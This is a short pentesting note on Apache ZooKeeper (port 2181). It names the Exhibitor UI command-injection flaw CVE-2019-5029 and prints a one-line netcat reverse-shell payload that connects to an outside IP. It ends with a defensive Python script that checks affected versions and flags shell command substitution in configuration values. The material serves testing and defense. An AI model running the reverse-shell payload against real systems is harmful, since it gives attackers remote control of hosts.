2181 - ZooKeeper

Apache ZooKeeper is a centralized service designed to manage configuration, naming, synchronization, and coordination in distributed systems. It helps multiple nodes in a cluster maintain consistent state and coordinate actions, ensuring reliability and fault tolerance in complex environments. By default, ZooKeeper listens on TCP port 2181, which is used for client connections to the service and inter-node communication within the cluster.

RCE

# Identify ZooKeeper
PORT      STATE SERVICE     VERSION
2181/tcp  open  zookeeper   Zookeeper 3.4.6-1569965 (Built on 02/20/2014)

[Figure: ZooKeeper Exhibitor's UI]

ZooKeeper Exhibitor's UI (1.0.9 to 1.7.1) has an RCE vulnerability (CVE-2019-5029) with an available PoC:

# Payload
$(/bin/nc -e /bin/sh 192.168.45.236 80 &)
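
A defender-side check for the issue above, as an added example that is not part of the original notes: it tests whether an Exhibitor version falls in the affected range the page gives, and flags configuration values that carry shell command substitution (the `$(...)` form of the payload above, plus backticks, the equivalent shell syntax). The key=value export format, the key names and the sample values are constructed assumptions.

```python
import re

# Affected Exhibitor range as stated on the page: 1.0.9 to 1.7.1, inclusive.
AFFECTED_MIN, AFFECTED_MAX = (1, 0, 9), (1, 7, 1)

# Openers of shell command substitution: $( ... ) and backticks.
SUBSTITUTION = re.compile(r"\$\(|`")

def parse_version(text):
    """Extract (major, minor, patch) from strings like '1.7.1' or 'v1.5.6-SNAPSHOT'."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if match is None:
        raise ValueError(f"no x.y.z version in {text!r}")
    return tuple(int(part) for part in match.groups())

def is_affected(version_text):
    """True when the version lies inside the affected range given on the page."""
    return AFFECTED_MIN <= parse_version(version_text) <= AFFECTED_MAX

def suspicious_values(config_text):
    """Return (line_number, key, value) for every key=value entry whose value
    contains a command-substitution opener. Comments and blank lines are skipped."""
    findings = []
    for number, raw in enumerate(config_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        if SUBSTITUTION.search(value):
            findings.append((number, key.strip(), value.strip()))
    return findings

# Constructed sample export; key names and values are hypothetical.
SAMPLE_CONFIG = """\
# exported configuration (constructed)
example.client-port=2181
example.install-dir=/opt/zookeeper
example.env-a=export JVMFLAGS="-Xmx512m" $(id)
example.env-b=export ZOO_LOG_DIR=`hostname`
example.check-ms=30000
"""

if __name__ == "__main__":
    print("1.7.1 affected:", is_affected("1.7.1"))
    for number, key, _ in suspicious_values(SAMPLE_CONFIG):
        print(f"line {number}: {key} contains shell command substitution")
```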
